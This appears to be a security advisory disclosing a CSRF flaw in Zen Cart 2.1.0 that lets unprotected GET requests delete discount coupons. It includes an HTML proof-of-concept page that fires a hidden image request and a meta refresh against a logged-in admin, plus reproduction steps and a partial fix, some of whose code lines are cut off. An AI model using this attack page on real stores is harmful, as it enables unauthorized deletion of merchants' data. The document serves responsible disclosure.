Zen Cart 2.1.0 Cross-Site Request Forgery (CSRF) Vulnerability Exposes Unauthorized Actions

Security Vulnerability Report – CSRF in Coupon Management

Vulnerability Type: Cross-Site Request Forgery (CSRF)


A CSRF vulnerability has been identified in the coupon management system that allows unauthorized deletion of discount coupons through crafted GET requests.

Affected Version

Zen Cart 2.1.0

Technical Details

The vulnerability exists in the session validation logic:

// filepath: /includes/init_includes/init_sessions.php
if ((isset($_GET['action']) || isset($_POST['action'])) && $_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!isset($_SESSION['securityToken'], $_POST['securityToken']) || 
        $_SESSION['securityToken'] !== $_POST['securityToken']) {
        zen_redirect(zen_href_link(FILENAME_DEFAULT, '', 'SSL'));

The security check only validates CSRF tokens for POST requests, leaving GET requests unprotected.

Proof of Concept

<!DOCTYPE html>
    <title>ZenCart Coupon Delete CSRF PoC</title>
    Author: [Your Name]
    Description: Proof of Concept for ZenCart CSRF Vulnerability
    Target Version: ZenCart 2.1.0
    Impact: Unauthorized deletion of discount coupons
    - Admin must be logged in
    - Knowledge of admin directory name
    - Valid coupon ID
        // Target configuration
        // Note: These values should be modified according to the target system
        const TARGET_DOMAIN = 'example.com';
        const RANDOM_ADMIN_DIR = 'RANDOM_ADMIN_DIR'; // ZenCart's randomized admin directory
        const COUPON_ID = '1';  // ID of the coupon to be deleted
        // Construct the base URL for the attack
        // Format: http://[domain]/[admin_dir]/index.php
        const BASE_URL = `http://${TARGET_DOMAIN}/${RANDOM_ADMIN_DIR}/index.php`;
        // Create and inject attack elements
        // Step 1: Initial delete request using hidden image
        // Step 2: Confirmation request using meta refresh
        // Note: 2-second delay ensures proper request sequence
            <!-- Step 1: Initiate deletion process -->
            <img src="${BASE_URL}?cmd=coupon_admin&action=voucherdelete&cid=${COUPON_ID}&page=1" 
                 alt="CSRF Attack Step 1">

            <!-- Step 2: Confirm deletion after 2-second delay -->
            <meta http-equiv="refresh" 

        // Update status display with current target information
        window.onload = function() {
            document.getElementById('displayDir').textContent = RANDOM_ADMIN_DIR;
            document.getElementById('displayCID').textContent = COUPON_ID;
    <!-- Status display section -->
    <div style="font-family: Arial, sans-serif; margin: 20px;">
        <h3>CSRF Attack Status Monitor</h3>
        <!-- Display current attack parameters -->
        <p>Target Admin Directory: <span id="displayDir"></span></p>
        <p>Target Coupon ID: <span id="displayCID"></span></p>
        <!-- Display attack progress -->
        <p>Step 1: Initiating deletion request via hidden image...</p>
        <p>Step 2: Confirming deletion via meta refresh (2-second delay)...</p>
        <!-- Technical details for debugging -->
        <div style="margin-top: 20px; font-size: 12px; color: #666;">
            <p>Note: This PoC demonstrates a CSRF vulnerability in ZenCart's coupon management system.</p>
            <p>Security Impact: Allows unauthorized deletion of discount coupons when admin is logged in.</p>
            <p>CVE Status: Pending</p>

Reproduction Steps

The CSRF attack can be executed under the following conditions:

  1. Administrator Creates Coupon:
    • An administrator creates a discount coupon (e.g., cid=1).
    • The system assigns a unique coupon ID (cid) to the coupon.
  2. Attacker Knowledge:
    • The attacker obtains the coupon ID (cid=1) and the Zen Cart admin URL (e.g., http://target/ADMIN_DIR/).
    • Note: The admin directory name (ADMIN_DIR) is randomized during installation but may be leaked or guessed.
  3. Malicious Page Delivery:
    • The attacker crafts an HTML page (see PoC below) containing:
      • A hidden <img> tag triggering a GET request to voucherdelete (initial deletion step).
      • <meta> refresh redirect to confirmdelete (final confirmation step).
    • The attacker tricks a logged-in administrator into visiting this page (e.g., via phishing).
  4. Attack Execution:
    • When the administrator loads the malicious page:
      • The browser automatically sends the admin session cookie with the GET requests.
      • The unprotected cid=1 parameter in the URL triggers coupon deletion without requiring token validation.


Key Conditions:

  • Administrator must be actively logged into Zen Cart.
  • Attacker must know the coupon ID (cid) and admin panel URL.


  • Unauthorized deletion of discount coupons
  • Potential business disruption
  • Bypass of administrative controls

Suggested Fix

Implement token validation for all sensitive operations:

if (isset($_GET['action']) || isset($_POST['action'])) {
    $action = $_GET['action'] ?? $_POST['action'] ?? '';
    if (in_array($action, ['voucherdelete', 'confirmdelete'])) {
        $token = $_SERVER['REQUEST_METHOD'] === 'POST' ? 
                $_POST['securityToken'] : 
        if (!isset($_SESSION['securityToken'], $token) || 
            $_SESSION['securityToken'] !== $token) {
            zen_redirect(zen_href_link(FILENAME_DEFAULT, '', 'SSL'));

Additional Notes

  • The vulnerability requires knowledge of the randomized admin directory name
  • No special privileges required beyond admin authentication
  • Affects all installations using default security settings

Please treat this report with appropriate confidentiality until a fix is available.


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Source: github.com/k4yt3x/flowerhd